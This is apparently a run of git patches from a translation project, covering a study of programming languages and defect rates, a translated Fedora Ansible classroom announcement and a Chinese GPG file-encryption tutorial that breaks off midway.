We can read the model coefficients as the expected change in the log of the response for a one unit change in the predictor with all other predictors held constant; that is, for a coefficient  _βi_ , a one unit change in  _βi_  yields an expected change in the response of e _βi_ . For the factor variables, this expected change is compared to the average across all languages. Thus, if, for some number of commits, a particular project developed in an  _average_  language had four defective commits, then the choice to use C++ would mean that we should expect one additional defective commit since e0.18 × 4 = 4.79\. For the same project, choosing `Haskell` would mean that we should expect about one fewer defective commit as  _e_ −0.26 × 4 = 3.08\. The accuracy of this prediction depends on all other factors remaining the same, a challenging proposition for all but the most trivial of projects. All observational studies face similar limitations; we address this concern in more detail in Section 5. -**Result 1:**  _Some languages have a greater association with defects than other languages, although the effect is small._ +**Result 1:**  _Some languages have a greater association with defects than other languages, although the effect is small._ In the remainder of this paper we expand on this basic result by considering how different categories of application, defect, and language, lead to further insight into the relationship between languages and defect proneness. @@ -149,26 +149,26 @@ Rather than considering languages individually, we aggregate them by language cl As with language (earlier in [Table 6][67]), we are comparing language  _classes_  with the average behavior across all language classes. The model is presented in [Table 7][68]. It is clear that `Script-Dynamic-Explicit-Managed` class has the smallest magnitude coefficient. The coefficient is insignificant, that is, the z-test for the coefficient cannot distinguish the coefficient from zero. Given the magnitude of the standard error, however, we can assume that the behavior of languages in this class is very close to the average across all languages. We confirm this by recoding the coefficient using `Proc-Static-Implicit-Unmanaged` as the base level and employing treatment, or dummy coding that compares each language class with the base level. In this case, `Script-Dynamic-Explicit-Managed` is significantly different with  _p_  = 0.00044\. We note here that while choosing different coding methods affects the coefficients and z-scores, the models are identical in all other respects. When we change the coding we are rescaling the coefficients to reflect the comparison that we wish to make.[4][28] Comparing the other language classes to the grand mean, `Proc-Static-Implicit-Unmanaged` languages are more likely to induce defects. This implies that either implicit type conversion or memory management issues contribute to greater defect proneness as compared with other procedural languages. - [![t7.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg)][69] + [![t7.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t7.jpg)][69] **Table 7\. Functional languages have a smaller relationship to defects than other language classes whereas procedural languages are greater than or similar to the average.** Among scripting languages we observe a similar relationship between languages that allow versus those that do not allow implicit type conversion, providing some evidence that implicit type conversion (vs. explicit) is responsible for this difference as opposed to memory management. We cannot state this conclusively given the correlation between factors. However when compared to the average, as a group, languages that do not allow implicit type conversion are less error-prone while those that do are more error-prone. The contrast between static and dynamic typing is also visible in functional languages. The functional languages as a group show a strong difference from the average. Statically typed languages have a substantially smaller coefficient yet both functional language classes have the same standard error. This is strong evidence that functional static languages are less error-prone than functional dynamic languages, however, the z-tests only test whether the coefficients are different from zero. In order to strengthen this assertion, we recode the model as above using treatment coding and observe that the `Functional-Static-Explicit-Managed` language class is significantly less defect-prone than the `Functional-Dynamic-Explicit-Managed`language class with  _p_  = 0.034. - [![ut2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg)][70] + [![ut2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut2.jpg)][70] As with language and defects, the relationship between language class and defects is based on a small effect. The deviance explained is similar, albeit smaller, with language class explaining much less than 1% of the deviance. We now revisit the question of application domain. Does domain have an interaction with language class? Does the choice of, for example, a functional language, have an advantage for a particular domain? As above, a Chi-square test for the relationship between these factors and the project domain yields a value of 99.05 and  _df_  = 30 with  _p_  = 2.622e–09 allowing us to reject the null hypothesis that the factors are independent. Cramer's-V yields a value of 0.133, a weak level of association. Consequently, although there is some relation between domain and language, there is only a weak relationship between domain and language class. -**Result 2:**  _There is a small but significant relationship between language class and defects. Functional languages are associated with fewer defects than either procedural or scripting languages._ +**Result 2:**  _There is a small but significant relationship between language class and defects. Functional languages are associated with fewer defects than either procedural or scripting languages._ It is somewhat unsatisfying that we do not observe a strong association between language, or language class, and domain within a project. An alternative way to view this same data is to disregard projects and aggregate defects over all languages and domains. Since this does not yield independent samples, we do not attempt to analyze it statistically, rather we take a descriptive, visualization-based approach. We define  _Defect Proneness_  as the ratio of bug fix commits over total commits per language per domain. [Figure 1][71] illustrates the interaction between domain and language using a heat map, where the defect proneness increases from lighter to darker zone. We investigate which language factors influence defect fixing commits across a collection of projects written across a variety of languages. This leads to the following research question: - [![f1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg)][72] + [![f1.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f1.jpg)][72] **Figure 1\. Interaction of language's defect proneness with domain. Each cell in the heat map represents defect proneness of a language (row header) for a given domain (column header). The "Overall" column represents defect proneness of a language over all the domains. The cells with white cross mark indicate null value, that is, no commits were made corresponding to that cell.** **RQ3\. Does language defect proneness depend on domain?** @@ -177,9 +177,9 @@ In order to answer this question we first filtered out projects that would have We see only a subdued variation in this heat map which is a result of the inherent defect proneness of the languages as seen in RQ1\. To validate this, we measure the pairwise rank correlation between the language defect proneness for each domain with the overall. For all of the domains except Database, the correlation is positive, and p-values are significant (<0.01). Thus, w.r.t. defect proneness, the language ordering in each domain is strongly correlated with the overall language ordering. - [![ut3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg)][74] + [![ut3.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut3.jpg)][74] -**Result 3:**  _There is no general relationship between application domain and language defect proneness._ +**Result 3:**  _There is no general relationship between application domain and language defect proneness._ We have shown that different languages induce a larger number of defects and that this relationship is not only related to particular languages but holds for general classes of languages; however, we find that the type of project does not mediate this relationship to a large degree. We now turn our attention to categorization of the response. We want to understand how language relates to specific kinds of defects and how this relationship compares to the more general relationship that we observe. We divide the defects into categories as described in [Table 5][75] and ask the following question: @@ -187,12 +187,12 @@ We have shown that different languages induce a larger number of defects and tha We use an approach similar to RQ3 to understand the relation between languages and bug categories. First, we study the relation between bug categories and language class. A heat map ([Figure 2][76]) shows aggregated defects over language classes and bug types. To understand the interaction between bug categories and languages, we use an NBR regression model for each category. For each model we use the same control factors as RQ1 as well as languages encoded with weighted effects to predict defect fixing commits. - [![f2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg)][77] + [![f2.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/f2.jpg)][77] **Figure 2\. Relation between bug categories and language class. Each cell represents percentage of bug fix commit out of all bug fix commits per language class (row header) per bug category (column header). The values are normalized column wise.** The results along with the anova value for language are shown in [Table 8][78]. The overall deviance for each model is substantially smaller and the proportion explained by language for a specific defect type is similar in magnitude for most of the categories. We interpret this relationship to mean that language has a greater impact on specific categories of bugs, than it does on bugs overall. In the next section we expand on these results for the bug categories with significant bug counts as reported in [Table 5][79]. However, our conclusion generalizes for all categories. - [![t8.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg)][80] + [![t8.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/t8.jpg)][80] **Table 8\. While the impact of language on defects varies across defect category, language has a greater impact on specific categories than it does on defects in general.** **Programming errors.** Generic programming errors account for around 88.53% of all bug fix commits and occur in all the language classes. Consequently, the regression analysis draws a similar conclusion as of RQ1 (see [Table 6][81]). All languages incur programming errors such as faulty error-handling, faulty definitions, typos, etc. @@ -201,7 +201,7 @@ The results along with the anova value for language are shown in [Table 8][78]. **Concurrency errors.** 1.99% of the total bug fix commits are related to concurrency errors. The heat map shows that `Proc-Static-Implicit-Unmanaged` dominates this error type. C and C++ introduce 19.15% and 7.89% of the errors, and they are distributed across the projects. - [![ut4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg)][84] + [![ut4.jpg](http://deliveryimages.acm.org/10.1145/3130000/3126905/ut4.jpg)][84] Both of the `Static-Strong-Managed` language classes are in the darker zone in the heat map confirming, in general static languages produce more concurrency errors than others. Among the dynamic languages, only `Erlang` is more prone to concurrency errors, perhaps relating to the greater use of this language for concurrent applications. Likewise, the negative coefficients in [Table 8][85] shows that projects written in dynamic languages like `Ruby` and `Php` have fewer concurrency errors. Note that, certain languages like `JavaScript, CoffeeScript`, and `TypeScript` do not support concurrency, in its traditional form, while `Php` has a limited support depending on its implementations. These languages introduce artificial zeros in the data, and thus the concurrency model coefficients in [Table 8][86] for those languages cannot be interpreted like the other coefficients. Due to these artificial zeros, the average over all languages in this model is smaller, which may affect the sizes of the coefficients, since they are given w.r.t. the average, but it will not affect their relative relationships, which is what we are after. @@ -209,7 +209,7 @@ A textual analysis based on word-frequency of the bug fix messages suggests that **Security and other impact errors.** Around 7.33% of all the bug fix commits are related to Impact errors. Among them `Erlang, C++`, and `Python` associate with more security errors than average ([Table 8][87]). `Clojure` projects associate with fewer security errors ([Figure 2][88]). From the heat map we also see that `Static` languages are in general more prone to failure and performance errors, these are followed by `Functional-Dynamic-Explicit-Managed` languages such as `Erlang`. The analysis of deviance results confirm that language is strongly associated with failure impacts. While security errors are the weakest among the categories, the deviance explained by language is still quite strong when compared with the residual deviance. -**Result 4:**  _Defect types are strongly associated with languages; some defect type like memory errors and concurrency errors also depend on language primitives. Language matters more for specific categories than it does for defects overall._ +**Result 4:**  _Defect types are strongly associated with languages; some defect type like memory errors and concurrency errors also depend on language primitives. Language matters more for specific categories than it does for defects overall._ [Back to Top][89] From 5b7e80a1b469c3e1fad329e4aac0847a4f0a4938 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 22:55:39 +0800 Subject: [PATCH 0357/1627] translated --- ...01 Fedora Classroom Session_Ansible 101.md | 73 ------------------- ...01 Fedora Classroom Session_Ansible 101.md | 71 ++++++++++++++++++ 2 files changed, 71 insertions(+), 73 deletions(-) delete mode 100644 sources/tech/20171201 Fedora Classroom Session_Ansible 101.md create mode 100644 translated/tech/20171201 Fedora Classroom Session_Ansible 101.md diff --git a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md deleted file mode 100644 index 628cd79497..0000000000 --- a/sources/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ /dev/null @@ -1,73 +0,0 @@ -translating---imquanquan - -### [Fedora Classroom Session: Ansible 101][2] - -### By Sachin S Kamath - -![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) - -Fedora Classroom sessions continue this week with an Ansible session. The general schedule for sessions appears [on the wiki][3]. You can also find [resources and recordings from previous sessions][4] there. Here are details about this week’s session on [Thursday, 30th November at 1600 UTC][5]. That link allows you to convert the time to your timezone. - -### Topic: Ansible 101 - -As the Ansible [documentation][6] explains, Ansible is an IT automation tool. It’s primarily used to configure systems, deploy software, and orchestrate more advanced IT tasks. Examples include continuous deployments or zero downtime rolling updates. - -This Classroom session covers the topics listed below: - -1. Introduction to SSH - -2. Understanding different terminologies - -3. Introduction to Ansible - -4. Ansible installation and setup - -5. Establishing password-less connection - -6. Ad-hoc commands - -7. Managing inventory - -8. Playbooks examples - -There will also be a follow-up Ansible 102 session later. That session will cover complex playbooks, roles, dynamic inventory files, control flow and Galaxy. - -### Instructors - -We have two experienced instructors handling this session. - -[Geoffrey Marr][7], also known by his IRC name as “coremodule,” is a Red Hat employee and Fedora contributor with a background in Linux and cloud technologies. While working, he spends his time lurking in the [Fedora QA][8] wiki and test pages. Away from work, he enjoys RaspberryPi projects, especially those focusing on software-defined radio. - -[Vipul Siddharth][9] is an intern at Red Hat who also works on Fedora. He loves to contribute to open source and seeks opportunities to spread the word of free and open source software. - -### Joining the session - -This session takes place on [BlueJeans][10]. The following information will help you join the session: - -* URL: [https://bluejeans.com/3466040121][1] - -* Meeting ID (for Desktop App): 3466040121 - -We hope you attend, learn from, and enjoy this session! If you have any feedback about the sessions, have ideas for a new one or want to host a session, please feel free to comment on this post or edit the [Classroom wiki page][11]. - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ - -作者:[Sachin S Kamath] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://bluejeans.com/3466040121 -[2]:https://fedoramagazine.org/fedora-classroom-session-ansible-101/ -[3]:https://fedoraproject.org/wiki/Classroom -[4]:https://fedoraproject.org/wiki/Classroom#Previous_Sessions -[5]:https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fedora+Classroom+-+Ansible+101&iso=20171130T16&p1=%3A -[6]:http://docs.ansible.com/ansible/latest/index.html -[7]:https://fedoraproject.org/wiki/User:Coremodule -[8]:https://fedoraproject.org/wiki/QA -[9]:https://fedoraproject.org/wiki/User:Siddharthvipul1 -[10]:https://www.bluejeans.com/downloads -[11]:https://fedoraproject.org/wiki/Classroom diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md new file mode 100644 index 0000000000..094bc6e044 --- /dev/null +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -0,0 +1,71 @@ +### [Fedora 课堂会议: Ansible 101][2] + +### By Sachin S Kamath + +![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) + +Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [on the wiki][3]。你还可以从那里找到[之前会议的资源和录像][4]。以下是本周[11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 + +### 主题: Ansible 101 + +正如 Ansible [文档][6] 所说, Ansible 是一个 IT 自动化工具。它主要用于配置系统,部署软件和编排更高级的 IT 任务。示例包括持续交付与零停机滚动升级。 + +本课堂课程涵盖以下主题: + +1. SSH 简介 + +2. 了解不同的术语 + +3. Ansible 简介 + +4. Ansible 安装和设置 + +5. 建立无密码连接 + +6. Ad-hoc 命令 + +7. 管理 inventory + +8. Playbooks 示例 + +稍后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具. + +### 讲师 + +我们有两位经验丰富的讲师进行这次会议。 + +[Geoffrey Marr][7],IRC 聊天室中名字叫 coremodule,是 Red Hat 的一名员工和 Fedora 的贡献者,拥有 Linux 和云技术的背景。工作时, 他潜心于 [Fedora QA][8] wiki 和测试页面下。业余时间, 他热衷于 RaspberryPi 项目, 尤其是专注于那些软件无线电(Software-defined radio)项目。 + +[Vipul Siddharth][9] 是Red Hat的实习生,他也在Fedora上工作。他喜欢贡献开源,借此机会传播自由开源软件。 + +### 加入会议 + +本次会议将在 [BlueJeans][10] 上进行。下面的信息可以帮你加入到会议: + +* 网址: [https://bluejeans.com/3466040121][1] + +* 会议 ID (桌面版): 3466040121 + +我们希望您可以参加,学习,并享受这个会议!如果您对会议有任何反馈意见,有什么新的想法或者想要主持一个会议, 可以随时在这篇文章发表评论或者查看[课堂 wiki 页面][11]. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ + +作者:[Sachin S Kamath] +译者:[imquanquan](https://github.com/imquanquan) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://bluejeans.com/3466040121 +[2]:https://fedoramagazine.org/fedora-classroom-session-ansible-101/ +[3]:https://fedoraproject.org/wiki/Classroom +[4]:https://fedoraproject.org/wiki/Classroom#Previous_Sessions +[5]:https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fedora+Classroom+-+Ansible+101&iso=20171130T16&p1=%3A +[6]:http://docs.ansible.com/ansible/latest/index.html +[7]:https://fedoraproject.org/wiki/User:Coremodule +[8]:https://fedoraproject.org/wiki/QA +[9]:https://fedoraproject.org/wiki/User:Siddharthvipul1 +[10]:https://www.bluejeans.com/downloads +[11]:https://fedoraproject.org/wiki/Classroom From 437740dee3a014494349b2c94ee0aa405b73621b Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 22:58:25 +0800 Subject: [PATCH 0358/1627] translated --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index 094bc6e044..c57a20afd7 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -4,7 +4,7 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) -Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [on the wiki][3]。你还可以从那里找到[之前会议的资源和录像][4]。以下是本周[11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 +Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是本周[11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 ### 主题: Ansible 101 From 112fd9d835bff132820bfde31355b18f674ed329 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 23:00:07 +0800 Subject: [PATCH 0359/1627] fix errors --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index c57a20afd7..3941b8b702 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -4,7 +4,7 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) -Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是本周[11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 +Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是会议的具体时间 [本周11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 ### 主题: Ansible 101 From 4bb45667cf341c8cb5b15c4241422ee1d1bd2753 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 23:04:10 +0800 Subject: [PATCH 0360/1627] translated --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index 3941b8b702..184671cdff 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -34,7 +34,7 @@ Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时 我们有两位经验丰富的讲师进行这次会议。 -[Geoffrey Marr][7],IRC 聊天室中名字叫 coremodule,是 Red Hat 的一名员工和 Fedora 的贡献者,拥有 Linux 和云技术的背景。工作时, 他潜心于 [Fedora QA][8] wiki 和测试页面下。业余时间, 他热衷于 RaspberryPi 项目, 尤其是专注于那些软件无线电(Software-defined radio)项目。 +[Geoffrey Marr][7],IRC 聊天室中名字叫 coremodule,是 Red Hat 的一名员工和 Fedora 的贡献者,拥有 Linux 和云技术的背景。工作时,他潜心于 [Fedora QA][8] wiki 和测试页面下。业余时间, 他热衷于 RaspberryPi 项目,尤其是专注于那些软件无线电(Software-defined radio)项目。 [Vipul Siddharth][9] 是Red Hat的实习生,他也在Fedora上工作。他喜欢贡献开源,借此机会传播自由开源软件。 From e6d475a5c54411eb1bdae568d168db54fa451cb9 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 23:04:59 +0800 Subject: [PATCH 0361/1627] Update 20171201 Fedora Classroom Session_Ansible 101.md --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index 184671cdff..26b3f1c42e 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -4,11 +4,11 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) -Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是会议的具体时间 [本周11月30日星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 +Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是会议的具体时间 [11月30日本周星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 ### 主题: Ansible 101 -正如 Ansible [文档][6] 所说, Ansible 是一个 IT 自动化工具。它主要用于配置系统,部署软件和编排更高级的 IT 任务。示例包括持续交付与零停机滚动升级。 +正如 Ansible [文档][6] 所说,Ansible 是一个 IT 自动化工具。它主要用于配置系统,部署软件和编排更高级的 IT 任务。示例包括持续交付与零停机滚动升级。 本课堂课程涵盖以下主题: From 3297f7cda45030951ae6af5eb614863ea4e35f2c Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 23:15:52 +0800 Subject: [PATCH 0362/1627] translated --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index 26b3f1c42e..1ebee40a44 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -28,13 +28,13 @@ Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时 8. Playbooks 示例 -稍后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具. +之后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具. ### 讲师 我们有两位经验丰富的讲师进行这次会议。 -[Geoffrey Marr][7],IRC 聊天室中名字叫 coremodule,是 Red Hat 的一名员工和 Fedora 的贡献者,拥有 Linux 和云技术的背景。工作时,他潜心于 [Fedora QA][8] wiki 和测试页面下。业余时间, 他热衷于 RaspberryPi 项目,尤其是专注于那些软件无线电(Software-defined radio)项目。 +[Geoffrey Marr][7],IRC 聊天室中名字叫 coremodule,是 Red Hat 的一名员工和 Fedora 的贡献者,拥有 Linux 和云技术的背景。工作时,他潜心于 [Fedora QA][8] wiki 和测试页面中。业余时间, 他热衷于 RaspberryPi 项目,尤其是专注于那些软件无线电(Software-defined radio)项目。 [Vipul Siddharth][9] 是Red Hat的实习生,他也在Fedora上工作。他喜欢贡献开源,借此机会传播自由开源软件。 From fdb26b4cc65630c85a8c2017584fcf58ab42dbb4 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Wed, 6 Dec 2017 23:24:38 +0800 Subject: [PATCH 0363/1627] translated --- .../tech/20171201 Fedora Classroom Session_Ansible 101.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md index 1ebee40a44..4a4c5514ba 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md @@ -4,7 +4,7 @@ ![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) -Fedora 课堂会议本周继续进行本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是会议的具体时间 [11月30日本周星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 +Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的时间安排表发布在 [wiki][3] 上。你还可以从那里找到[之前会议的资源和录像][4]。以下是会议的具体时间 [11月30日本周星期四 1600 UTC][5]。该链接可以将这个时间转换为您的时区上的时间。 ### 主题: Ansible 101 From 8cb7cea13716d0435eab2defbf903febfe3d3bcf Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 23:38:32 +0800 Subject: [PATCH 0364/1627] PUB:20170910 Cool vim feature sessions.md @geekpi --- .../tech => published}/20170910 Cool vim feature sessions.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170910 Cool vim feature sessions.md (100%) diff --git a/translated/tech/20170910 Cool vim feature sessions.md b/published/20170910 Cool vim feature sessions.md similarity index 100% rename from translated/tech/20170910 Cool vim feature sessions.md rename to published/20170910 Cool vim feature sessions.md From 3d2b8967e59276ccf7bc7382a44939a8b971ca90 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 23:51:22 +0800 Subject: [PATCH 0365/1627] PRF&PUB:20171024 How to Encrypt and Decrypt Individual Files With GPG.md @lujun9972 https://linux.cn/article-9118-1.html --- ...t and Decrypt Individual Files With GPG.md | 92 +++++++++---------- 1 file changed, 45 insertions(+), 47 deletions(-) rename {translated/tech => published}/20171024 How to Encrypt and Decrypt Individual Files With GPG.md (60%) diff --git a/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md b/published/20171024 How to Encrypt and Decrypt Individual Files With GPG.md similarity index 60% rename from translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md rename to published/20171024 How to Encrypt and Decrypt Individual Files With GPG.md index 6b534be640..dffab516ac 100644 --- a/translated/tech/20171024 How to Encrypt and Decrypt Individual Files With GPG.md +++ b/published/20171024 How to Encrypt and Decrypt Individual Files With GPG.md @@ -1,68 +1,66 @@ 如何使用 GPG 加解密文件 ------- -### 目标 +================= -使用 GPG 加密文件 +目标:使用 GPG 加密文件 -### 发行版 +发行版:适用于任何发行版 -适用于任何发行版 +要求:安装了 GPG 的 Linux 或者拥有 root 权限来安装它。 -### 要求 +难度:简单 -安装了 GPG 的 Linux 或者拥有 root 权限来安装它。 +约定: -### 难度 - -简单 - -### 约定 - -* # - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 sudo 命令 - -* $ - 可以使用普通用户来执行指定命令 +* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行,也可以使用 `sudo` 命令 +* `$` - 可以使用普通用户来执行指定命令 ### 介绍 -加密非常重要。它对于保护敏感信息来说是必不可少的。 -你的私人文件应该要被加密,而 GPG 提供了很好的解决方案。 +加密非常重要。它对于保护敏感信息来说是必不可少的。你的私人文件应该要被加密,而 GPG 提供了很好的解决方案。 ### 安装 GPG -GPG 的使用非常广泛。你在几乎每个发行版的仓库中都能找到它。 -如果你还没有安装它,那现在就来安装一下吧。 +GPG 的使用非常广泛。你在几乎每个发行版的仓库中都能找到它。如果你还没有安装它,那现在就来安装一下吧。 -#### Debian/Ubuntu +**Debian/Ubuntu** -```shell +``` $ sudo apt install gnupg ``` -#### Fedora -```shell + +**Fedora** + +``` # dnf install gnupg2 ``` -#### Arch -```shell + +**Arch** + +``` # pacman -S gnupg ``` -#### Gentoo -```shell + +**Gentoo** + +``` # emerge --ask app-crypt/gnupg ``` -### Create a Key -你需要一个密钥对来加解密文件。如果你为 SSH 已经生成过了密钥对,那么你可以直接使用它。 -如果没有,GPG 包含工具来生成密钥对。 -```shell +### 创建密钥 + +你需要一个密钥对来加解密文件。如果你为 SSH 已经生成过了密钥对,那么你可以直接使用它。如果没有,GPG 包含工具来生成密钥对。 + +``` $ gpg --full-generate-key ``` -GPG 有一个命令行程序帮你一步一步的生成密钥。它还有一个简单得多的工具,但是这个工具不能让你设置密钥类型,密钥的长度以及过期时间,因此不推荐使用这个工具。 + +GPG 有一个命令行程序可以帮你一步一步的生成密钥。它还有一个简单得多的工具,但是这个工具不能让你设置密钥类型,密钥的长度以及过期时间,因此不推荐使用这个工具。 GPG 首先会询问你密钥的类型。没什么特别的话选择默认值就好。 下一步需要设置密钥长度。`4096` 是一个不错的选择。 -之后,可以设置过期的日期。 如果希望密钥永不过期则设置为 `0` +之后,可以设置过期的日期。 如果希望密钥永不过期则设置为 `0`。 然后,输入你的名称。 @@ -72,20 +70,19 @@ GPG 首先会询问你密钥的类型。没什么特别的话选择默认值就 所有这些都完成后,GPG 会让你校验一下这些信息。 -GPG 还会问你是否需要为密钥设置密码。这一步是可选的, 但是会增加保护的程度。 -若需要设置密码,则 GPG 会收集你的操作信息来增加密钥的健壮性。 所有这些都完成后, GPG 会显示密钥相关的信息。 +GPG 还会问你是否需要为密钥设置密码。这一步是可选的, 但是会增加保护的程度。若需要设置密码,则 GPG 会收集你的操作信息来增加密钥的健壮性。 所有这些都完成后, GPG 会显示密钥相关的信息。 ### 加密的基本方法 -现在你拥有了自己的密钥,加密文件非常简单。 使用虾米那命令在 `/tmp` 目录中创建一个空白文本文件。 +现在你拥有了自己的密钥,加密文件非常简单。 使用下面的命令在 `/tmp` 目录中创建一个空白文本文件。 -```shell +``` $ touch /tmp/test.txt ``` 然后用 GPG 来加密它。这里 `-e` 标志告诉 GPG 你想要加密文件, `-r` 标志指定接收者。 -```shell 